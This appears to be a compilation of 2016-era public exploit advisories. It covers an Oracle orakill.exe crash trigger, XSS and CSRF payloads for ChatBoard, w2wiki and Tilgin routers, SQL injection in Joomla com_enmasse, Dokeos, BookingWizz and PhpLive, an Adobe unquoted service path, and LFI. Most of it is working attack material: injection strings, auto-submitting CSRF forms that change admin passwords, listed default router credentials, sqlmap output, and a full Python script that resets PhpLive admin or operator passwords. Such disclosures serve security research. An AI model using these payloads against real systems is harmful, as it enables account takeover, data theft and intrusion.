ECX 0018FCA8 ASCII "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaarrrr"
EDX 00000000
EBX 61616161
ESP 0018FD10 ASCII "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaarrrr"
EBP 61616161
ESI 61616161
EDI 61616161
EIP 61616161
C 0 ES 002B 32bit 0(FFFFFFFF)
P 0 CS 0023 32bit 0(FFFFFFFF)
A 0 SS 002B 32bit 0(FFFFFFFF)
Z 0 DS 002B 32bit 0(FFFFFFFF)
S 0 FS 0053 32bit 7EFDD000(FFF)
T 0 GS 002B 32bit 0(FFFFFFFF)
D 0
O 0 LastErr ERROR_SUCCESS (00000000)
EFL 00010202 (NO,NB,NE,A,NS,PO,GE,G)
ST0 empty g
ST1 empty g
ST2 empty g
ST3 empty g
ST4 empty g
ST5 empty g
ST6 empty g
ST7 empty g
3 2 1 0 E S P U O Z D I
FST 0000 Cond 0 0 0 0 Err 0 0 0 0 0 0 0 0 (GT)
FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1
Exploit code(s):
================
'''
import subprocess
# Local crash trigger for orakill.exe v11.2.0 (see advisory text above).
# Note the trailing space on the executable path is kept as in the original.
pgm = "C:\\oraclexe\\app\\oracle\\product\\11.2.0\\server\\bin\\orakill.exe "
# First argument: 100 filler bytes followed by "RRRR" (104 bytes in total, which the
# register dump above shows landing in EBX/EBP/ESI/EDI/EIP as 0x61616161 after lower-casing).
payload = "".join(["A" * 100, "RRRR"])
# Second argument: the advisory says 4 bytes; this string is five characters including the
# leading space -- presumably harmless, not verified here.
args = [pgm, payload, " BBBB"]
subprocess.Popen(args, shell=False)
'''
Disclosure Timeline:
====================================
Vendor Notification: October 5, 2015
Vendor Fix: April 25, 2016
June 13, 2016 : Public Disclosure
Exploitation Technique:
=======================
Local
Severity Level:
================
Low
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere.
hyp3rlinx
'''
# Exploit Title: Ultrabenosaurus ChatBoard - Stored XSS
# Date: 2016-06-14
# Exploit Author: HaHwul
# Exploit Author Blog: www.hahwul.com
# Vendor Homepage: http://ultrabenosaurus.ninja/
# Software Link: https://github.com/Ultrabenosaurus/ChatBoard/archive/master.zip
# Tested on: Debian [wheezy]
### Vulnerability Point
chat.php does not filter or encode special characters in the msg parameter before storing it
-> file: ./chat.php
-> param: msg
### Vulnerability Code
POST /vul_test/ChatBoard/__original/chat.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:44.0) Gecko/20100101 Firefox/44.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://127.0.0.1/vul_test/ChatBoard/__original/?chat
Content-Length: 10
Cookie: PHPSESSID=3oecem8o5c8975dcufbb0moqn5
Connection: keep-alive
msg=654<img src="z" onerror=zz>asd
<!--
# Exploit Title: Ultrabenosaurus ChatBoard - CSRF(Send Message)
# Date: 2016-06-14
# Exploit Author: HaHwul
# Exploit Author Blog: www.hahwul.com
# Vendor Homepage: http://ultrabenosaurus.ninja/
# Software Link: https://github.com/Ultrabenosaurus/ChatBoard/archive/master.zip
# Tested on: Debian [wheezy]
### Vulnerability Code
-----------------------------------------------------------------------------------------
POST /vul_test/ChatBoard/__original/chat.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:44.0) Gecko/20100101 Firefox/44.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://CSRF_NO_REFERE_CHECK
Content-Length: 8
Cookie: PHPSESSID=3oecem8o5c8975dcufbb0moqn5
Connection: keep-alive
msg=CSRF
### Response
-----------------------------------------------------------------------------------------
HTTP/1.1 200 OK
Date: Tue, 14 Jun 2016 01:52:02 GMT
Server: Apache/2.4.10 (Ubuntu)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 7
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
written
-----------------------------------------------------------------------------------------
### Vulnerability Code
-->
<!-- CSRF PoC: auto-submits a cross-origin POST to chat.php. It works because the request
     shown above carries no anti-CSRF token and a bogus Referer is still answered "written". -->
<form id="csrf_poc" name="csrf_poc" action="http://127.0.0.1/vul_test/ChatBoard/__original/chat.php" method="POST">
  <input type="hidden" name="msg" value="CSRF" />
  <input type="submit" value="CSRF Attack" />
</form>
<script type="text/javascript">
  document.getElementById('csrf_poc').submit();
</script>
# Exploit Title: w2wiki - Multiple XSS(Stored/Reflected)
# Date: 2016-06-14
# Exploit Author: HaHwul
# Exploit Author Blog: www.hahwul.com
# Vendor Homepage: https://github.com/panicsteve/w2wiki , http://groups.google.com/group/w2wiki
# Software Link: https://github.com/panicsteve/w2wiki/archive/master.zip
# Tested on: Debian [wheezy]
### Vulnerability 1 : Stored XSS
POST /vul_test/w2wiki/index.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:44.0) Gecko/20100101 Firefox/44.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/vul_test/w2wiki/index.php?action=new
Cookie: PHPSESSID=3oecem8o5c8975dcufbb0moqn5; W2=dgf6v5tn2ea8uitvk98m2tfjl7
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 82
page=xss&newText=afsd%3Cimg+src%3D%22h%22+onerror%3Dalert%2845%29%3Eaa&action=save
# Vulnerability influence can be found in the wiki. -> script in created page
================================================================================================
### Vulnerability 2 : Reflected XSS
edit page
http://127.0.0.1/vul_test/w2wiki/index.php?action=edit&page="><img src="z" onerror=alert(45)>
search page
http://127.0.0.1/vul_test/w2wiki/index.php?action=search&q="><img src="z" onerror=alert(45)>
# Exploit Title: Joomla com_enmasse - SQL Injection
# Author: [ Hamed Izadi ]
#IRAN
# Vendor Homepage : http://extensions.joomla.org/extensions/extension/social-web/social-buy/en-masse
# Category: [ Webapps ]
# Tested on: [ Win ]
# Versions: 5.1-6.4
# Date: 2016/06/15
# Google Dork: inurl:component/enmasse/
# PoC:
# id Parameter Vulnerable To SQL
# Demo:
# http://server/component/enmasse/term?tmpl=component&id=2%27
# Youtube: https://youtu.be/LB5qVnXhzXE
# L u Arg
----------------------------------------------------------------------------------------------------------
# Exploit Title: AdobeUpdateService - Privilege Escalation Unquoted Service Path vulnerability
# Date: 18/05/2016
# Exploit Author : Cyril Vallicari
# Vendor Homepage: http://www.adobe.com/fr/
# Software Link: http://www.adobe.com/downloads.html
# Version: 3.6.0.248
# Tested on: Windows 7 x64 SP1 (but it should work on all Windows versions)
The application suffers from an unquoted search path issue impacting the service 'AdobeUpdateService' for Windows deployed as part of Adobe Creative Cloud
This could potentially allow an authorized but non-privileged local user to execute arbitrary code with SYSTEM privileges (the service runs as LocalSystem, see below). Exploitation still requires write access to one of the directories along the unquoted path (e.g. to drop C:\Program.exe or "C:\Program Files (x86)\Common.exe"), which a default-permission install typically does not grant to standard users.
POC :
C:\Users\Utilisateur>sc qc AdobeUpdateService
[SC] QueryServiceConfig réussite(s)
SERVICE_NAME: AdobeUpdateService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : AdobeUpdateService
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
Video POC : https://www.youtube.com/watch?v=RyzYkd05xM4
Patch :
Fixed in version 3.7.0.271
Additional notes :
https://helpx.adobe.com/security/products/creative-cloud/apsb16-21.html
# Exploit Title: Dokeos Blind SQL Injection
# Date: 2016-06-14
# Exploit Author: Mormoroth
# Exploit Author Blog: http://ha.cker.ir
# Vendor Homepage: http://www.dokeos.com/
# Software Link: http://jaist.dl.sourceforge.net/project/dokeos/dokeos-2.1.1.zip
# Version: 2.2.1 (the PoC below was run against the dokeos-2.1.1 package linked above)
# Tested on: Ubuntu
# Twitter : https://twitter.com/Mormoroth
------
Note : hackme.com is localdomain on lab , not a live website
------
VULNERABILITY
The curdirpath parameter of main/document/slideshow.php is vulnerable to time-based blind SQL injection
------
POC :
Payload: http://hackme.com:80/dokeos-2.1.1/main/document/slideshow.php?cidReq=123&curdirpath=' AND (SELECT * FROM (SELECT(SLEEP(5)))Pfag) AND 'NFwV'='NFwV&slide_id=all
------
Exploiting vulnerability with Sqlmap
Note: to retrieve data with sqlmap, run it with the --tamper=between option
------
Parameter: #1* (URI)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: http://hackme.com:80/dokeos-2.1.1/main/document/slideshow.php?cidReq=123&curdirpath=' AND (SELECT * FROM (SELECT(SLEEP(5)))Pfag) AND 'NFwV'='NFwV&slide_id=all
------
[22:25:09] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7
back-end DBMS: MySQL 5.0.12
[22:25:09] [INFO] fetching current database
[22:25:09] [INFO] resumed: dokeos_main
current database: 'dokeos_main'
[22:25:09] [INFO] fetched data logged to text files under 'C:\Users\Mort\.sqlmap\output\hackme.com'
C:\Users\Mort\Desktop\Apps\sqlmap>
------
Hyperoptic (Tilgin) Router HG23xx Multiple XSS And CSRF Vulnerabilities
Vendor: Hyperoptic Ltd. | Tilgin AB
Product web page: http://www.hyperoptic.com
http://www.tilgin.com
Affected version: HG2330, HG2302 and HG2301
Summary: Tilgin's HG23xx family of products offers a flexible and
high capacity product in a tiny form factor. When having the product
in your hands, do not get fooled by its mere size. The product offers
full gigabit routing and a state of the art superior WLAN solution.
It runs all services offered with Tilgin HGA and is prepared for all
foreseeable future services. The product is also offered in an entry
level version with fast Ethernet LAN ports, still with gigabit Ethernet
WAN. The routing capacity and excellent WLAN remains the same also on
this model, the only limit being the fast Ethernet LAN ports.
Desc: The application allows users to perform certain actions via HTTP
requests without performing any validity checks to verify the requests.
This can be exploited to perform certain actions with administrative
privileges if a logged-in user visits a malicious web site. XSS issues
were also discovered: input passed via multiple POST and GET parameters
is not properly sanitized before being returned to the user. This can be
exploited to execute arbitrary HTML and script code in a user's browser
session in the context of an affected site.
Tested on: lighttpd/1.4.26-devel-166445
lighttpd/1.4.26-devel-163573
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5329
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5329.php
11.05.2016
--
Default credentials:
--------------------
user/user
admin/admin
admin/abcd2301
XSS PoC:
--------
POST /advanced/firewall_templates/ HTTP/1.1
Host: 192.168.1.1
__form=new&name=test"><script>prompt(1)</script>
Response:
[..snip..]
<INPUT type="hidden" name="name" value="test"><script>prompt(1)</script>">
[..snip..]
CSRF Add Storage (HTTP/SMB) User:
---------------------------------
<html>
<body>
<form action="http://192.168.1.1/storage/users/" method="POST">
<input type="hidden" name="__form" value="new" />
<input type="hidden" name="name" value="testuser" />
<input type="hidden" name="password" value="testpass" />
<input type="submit" value="Submit" />
</form>
</body>
</html>
CSRF Change Admin Password:
---------------------------
<html>
<body>
<form action="http://192.168.1.1/tools/admin_account/" method="POST">
<input type="hidden" name="__form" value="user" />
<input type="hidden" name="name" value="admin" />
<input type="hidden" name="password" value="NEWPASS" />
<input type="submit" value="Submit" />
</form>
</body>
</html>
1. ADVISORY INFORMATION
========================================
Title: BookingWizz < 5.5 Multiple Vulnerability
Application: BookingWizz
Class: Sensitive Information disclosure
Remotely Exploitable: Yes
Versions Affected: < 5.5
Vendor URL: http://codecanyon.net/item/booking-system/87919
Bugs: Default credentials, CSRF, XSS, SQL injection, LFI
Date of Public Advisory: 15 Jun 2016
Author: Mehmet Ince
2. CREDIT
========================================
These vulnerabilities were identified during an external penetration test
by Mehmet INCE from PRODAFT / INVICTUS
Original Advisory:
https://www.mehmetince.net/exploit/bookingwizz-55-multiple-vulnerability
PR1 - Default Administrator Credentials
========================================
File: install.php
People tend not to change default credentials unless the application forces
them to, so the installer should require a password change on first login.
Line 128: <br />Default username/password: <b>admin/pass</b></div>";
PR2 - Cross Site Scripting
========================================
File : eventList.php
// Improper user input validation: strip_tags() and the single-quote replacement on line 24 do not neutralise a double quote, so serviceID can break out of the href attribute on line 60.
Line 24: $serviceID =
(!empty($_REQUEST["serviceID"]))?strip_tags(str_replace("'","`",$_REQUEST["serviceID"])):getDefaultService();
Line 60: <?php echo SAMPLE_TEXT?> <strong><?php echo VIEW?> <a
href="index.php?serviceID=<?php echo $serviceID?>"><?php echo
CALENDAR?></a></strong>
Payload = 1337" onmouseover="alert(1)
PoC =
http://www.convergine.com/scripts/booking/eventList.php?serviceID=1337%22%20onmouseover=%22alert(1)
PR3 - Local File Inclusion
========================================
File:config.php
The lang variable is under user control; strip_tags() does nothing against path traversal sequences such as ../ (since the ".lang.php" suffix is appended below, only files with that suffix can be included).
Line 31: $lang = (!empty($_REQUEST["lang"])) ? strip_tags(str_replace("'",
"`", $_REQUEST["lang"])) : 'english';
The user-controlled value is stored in a session variable:
Line 36 - 38 :
if (!empty($_REQUEST["action"]) && $_REQUEST["action"] == "changelang") {
$_SESSION['curr_lang'] = $lang;
}
and later passed to include, which causes a straightforward file
inclusion.
Line 60 - 68:
$languagePath = MAIN_PATH."/languages/".$_SESSION['curr_lang'].".lang.php";
if(is_file($languagePath)) {
include MAIN_PATH."/languages/".$_SESSION['curr_lang'].".lang.php";
}else{
print "ERROR !!! Language file ".$_SESSION['curr_lang'].".lang.php not
found";
exit();
}
PR4 - SQL Injection
========================================
We saw many potential SQL injection vulnerabilities during code
review; two examples are given for these potential points.
File : ajax/checkDeletedServices.php
line 19 - 20:
$bsid = (!empty($_REQUEST["bsid"])) ? $_REQUEST["bsid"] : array();
$type = (!empty($_REQUEST["type"])) ? $_REQUEST["type"] : 'service';
Line 26:
if($type=='service'){
$service = getService($id);
$name = $service['name'];
}
This function interpolates $id (presumably taken from the user-supplied $bsid array in
checkDeletedServices.php) unescaped into the query; the fix is a prepared statement or a cast to int.
// VULNERABLE (PR4): $id is interpolated straight into the WHERE clause, so a value such as
// 1' AND SLEEP(5) AND 'WAlE'='WAlE is executed as SQL. Fix: cast to int or use a prepared statement.
function getService($id, $field=null) {
    $sql = "SELECT * FROM bs_services WHERE id='{$id}'"; // injection sink
    $res = mysql_query($sql);
    // A falsy $field (null, '', 0) returns the whole row, otherwise a single column of it.
    if ($field == null) {
        return mysql_fetch_assoc($res);
    } else {
        $row = mysql_fetch_assoc($res);
        return $row[$field];
    }
}
File : ajax/checkChangeAvailability.php
Line 19 -21
$id = (!empty($_REQUEST["id"])) ? $_REQUEST["id"] : '';
$interval = getServiceSettings($id,'interval');
getServiceSettings() interpolates $id into its own queries as well and, in addition, calls
getService(), which is vulnerable as shown above.
// VULNERABLE (PR4): $id reaches getService() unescaped and is also interpolated into both
// branches' queries below. Fix: cast to int or use prepared statements.
function getServiceSettings($id, $field=null) {
    $serviceType = getService($id,'type');
    if($serviceType=='t'){
        $sql = "SELECT * FROM bs_service_settings bss
INNER JOIN bs_services bs ON bss.serviceId = bs.id
WHERE bss.serviceID='{$id}'"; // injection sink
    }else{
        $sql = "SELECT * FROM bs_service_days_settings bsds
INNER JOIN bs_services bs ON bsds.idService = bs.id
WHERE bsds.idService='{$id}'"; // injection sink
    }
    $res = mysql_query($sql);
    $row = mysql_fetch_assoc($res);
    $row['type'] = $serviceType;
    // A falsy $field returns the whole row, otherwise a single column of it.
    if ($field == null) {
        return $row;
    } else {
        return $row[$field];
    }
}
Time-based blind SQL injection was used to exploit these flaws:
Payload: id=1' AND SLEEP(5) AND 'WAlE'='WAlE
PR5 - CSRF
========================================
File: bs-settings.php
This file is responsible for the administrator account settings. Here is the
HTTP POST request.
POST /booking/bs-settings.php HTTP/1.1
Host: www.test.dev
User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101
Firefox/36.04
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.test.dev/scripts/booking/bs-settings.php
Cookie: PHPSESSID=1511036c75229f53ae475a0615661394;
__utma=256227097.1395600583.1465982938.1465982938.1465982938.1;
__utmc=256227097;
__utmz=256227097.1465982938.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none);
wordfence_verifiedHuman=498f28acf0e6151e19053a23c0fbc76b
Connection: close
Content-Type: multipart/form-data;
boundary=---------------------------305761854111129072091034307
Content-Length: 2678
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="new_pass"
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="new_pass2"
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="email"
test@yopmail.com
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="pemail"
test@yopmail.com
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="pcurrency"
CAD
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="tax"
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="time_mode"
0
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="date_mode"
Y-m-d
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="use_popup"
1
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="currency"
$
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="currencyPos"
b
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="lang"
english
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="language_switch"
1
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="timezone"
America/Toronto
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="multi_day_notification"
0
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="multi_day_notification_on"
n
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="single_day_notification"
0
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="single_day_notification_on"
n
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="event_notification"
0
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="event_notification_on"
n
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="cron_type"
cron
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="edit_settings"
yes
-----------------------------305761854111129072091034307--
There is no CSRF token at all. Furthermore, the application does not require the
current password when new_pass is set, so a forged request can change the administrator's password and e-mail.
--
Sr. Information Security Engineer
https://www.mehmetince.net
#!/bin/env python
################################################################################################
# Exploit title: Password Recovery Sql Injection
# Exploit Author: Tiago Carvalho
# Vendor Homepage: http://www.phplivesupport.com/?plk=osicodes-5-ykq-m
# Version : 4.4.8 - 4.5.4
# Product Name: Phplive
# Tested on: Debian \ Kali linux 2016-1
################################################################################################
"""
There are multiple SQL injection vulnerabilities in this product.
The exploit uses the SQL injection in the last step of the password recovery process
and forces the application to reset the password and show the username, without requiring authentication
or ever executing the first step; the vulnerability allows the recovery of both admin and operator accounts.
Vulnerable code location: API/Setup/get.php
The filtering in place allows alphanumerics and restricts several special characters; the MySQL
escaping and stripslashes() are irrelevant because the id is interpolated unquoted (adminID = $adminid),
so a valid statement can be built without any special characters (hex literals such as 0x6125 stand in for quoted strings).
FUNCTION Setup_get_InfoByID( &$dbh,
$adminid )
{
if ( $adminid == "" )
return false ;
LIST( $adminid ) = database_mysql_quote( $dbh, $adminid ) ;
$query = "SELECT * FROM p_admins WHERE adminID = $adminid LIMIT 1" ;
database_mysql_query( $dbh, $query ) ;
if ( $dbh[ 'ok' ] )
{
$data = database_mysql_fetchrow( $dbh ) ;
return $data ;
}
return false ;
}
Vulnerable code location: /API/Ops/get.php
FUNCTION Ops_get_OpInfoByID( &$dbh,
$opid )
{
if ( $opid == "" )
return false ;
LIST( $opid ) = database_mysql_quote( $dbh, $opid ) ;
$query = "SELECT * FROM p_operators WHERE opID = $opid LIMIT 1" ;
database_mysql_query( $dbh, $query ) ;
if ( $dbh[ 'ok' ] )
{
$data = database_mysql_fetchrow( $dbh ) ;
return $data ;
}
return false ;
}
"""
import argparse
import hashlib
import md5
import re
import string
import urllib2
# Captures the text of every <div class="edit_title" ...>...</div> on a page;
# exploit() expects exactly two of them and prints both.
match = re.compile("<div\\sclass=\\\"edit_title\\\".*?>(.*)</div>", re.M)
# Host/path used by the commented-out sample call near the bottom of the file.
server_url = "localhost/phplive"
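def build_payload(host, sql, search_exp, target, last_active, passwd):
    """Build the password-recovery URL that carries the UNION injection.

    ``sql`` is a format string with three slots, filled in order with
    ``last_active``, ``passwd`` and ``search_exp``.  ``search_exp`` is a hex
    prefix such as ``0x61``; the ``25`` the caller's SQL appends turns it into
    ``0x6125``, which MySQL reads as ``'a%'`` -- a LIKE prefix sent without a
    single quote.  ``target`` is the id parameter name (``adminid``/``opid``);
    it is sent as ``0`` followed by the UNION so only the injected row comes
    back.  ``v`` is md5 of the concatenated ``last_active``/``passwd``
    integers -- presumably the value the recovery step compares against the
    row's own columns, which the UNION lets the attacker choose (inferred from
    the query shape, not from PhpLive code shown here).

    Returns the complete ``http://<host>/index.php?...`` URL as a str.
    Raises TypeError if ``last_active``/``passwd`` are not integers.
    """
    # hashlib replaces the py2-only md5 module (identical digest); encode so
    # the same line works on both Python 2 and 3.
    token = hashlib.md5(("%d%d" % (last_active, passwd)).encode("ascii")).hexdigest()
    injected = sql % (last_active, passwd, search_exp)
    query = "?v=%s&%s=0+%s" % (token, target, injected)
    return "http://%s/index.php%s" % (host, query)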
def exploit(host, admin, last_active, passwd):
    # Pick the table and column layout for the UNION. The injected row has to
    # match the real table's column count and put `login` where the recovery
    # page prints it; last_active/passwd are the two attacker-chosen integers
    # that build_payload also md5s into the v= token.
    if admin:
        target="adminid"
        sql = "union+all+select+adminid,created,%d,status,ses,login,%d,email+from+p_admins+where+login+like+%s25"
    else:
        target="opid"
        sql = "union+all+select+opid,%d,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,login,%d,0,0,0,0,0,0+from+p_operators+where+login+like+%s25"
    # One request per possible first letter of the login (LIKE 'x%'); the loop
    # stops at the first hit, so a single run recovers at most one account.
    char_list = list(string.ascii_letters)
    for char in char_list:
        payload = build_payload(host, sql, hex(ord(char)), target=target, last_active=last_active, passwd=passwd)
        # No error handling: urllib2 raises HTTPError/URLError on non-2xx or network failure.
        request = urllib2.urlopen(payload)
        if request.code == 200:
            html = request.read()
            result = match.findall(html)
            # Exactly two edit_title divs are taken as "reset done": the first is
            # printed with its <span> markup stripped, the second as-is -- which
            # value each holds is inferred from this print, not from PhpLive's template.
            if len(result) == 2 and result[1]:
                print "[*]\tSUCCESS!!!!!"
                print "[*]\t%s %s" % (re.sub("<span.*?>|</span>","",result[0]), result[1])
                break
# exploit(server_url, admin=False, last_active=1, passwd=1)
if __name__ == '__main__':
    admin = True
    parser = argparse.ArgumentParser(description='PhpLive 4.4.8 Password Recovery Sql injection Exploit')
    # -u is optional to argparse; if omitted, build_payload produces "http://None/index.php?..."
    parser.add_argument("-u", "--url", help="url host|ipaddress/path eg: localhost/phplive")
    parser.add_argument("-o", "--operator", help="Execute operators password reset", action="store_true")
    # Both integers are echoed into the injected UNION row and md5'd into the v=
    # token by build_payload; presumably any pair works as long as the same pair
    # is used for both (0/0 by default) -- not verified here.
    parser.add_argument("-l", "--lastactive", help="Last active date (int)", type=int, default=0)
    parser.add_argument("-p", "--passwd", help="Password (int)", type=int, default=0)
    args = parser.parse_args()
    if args.operator:
        print "[*]\toperator password reset"
        admin = False
    exploit(args.url, admin, args.lastactive, args.passwd)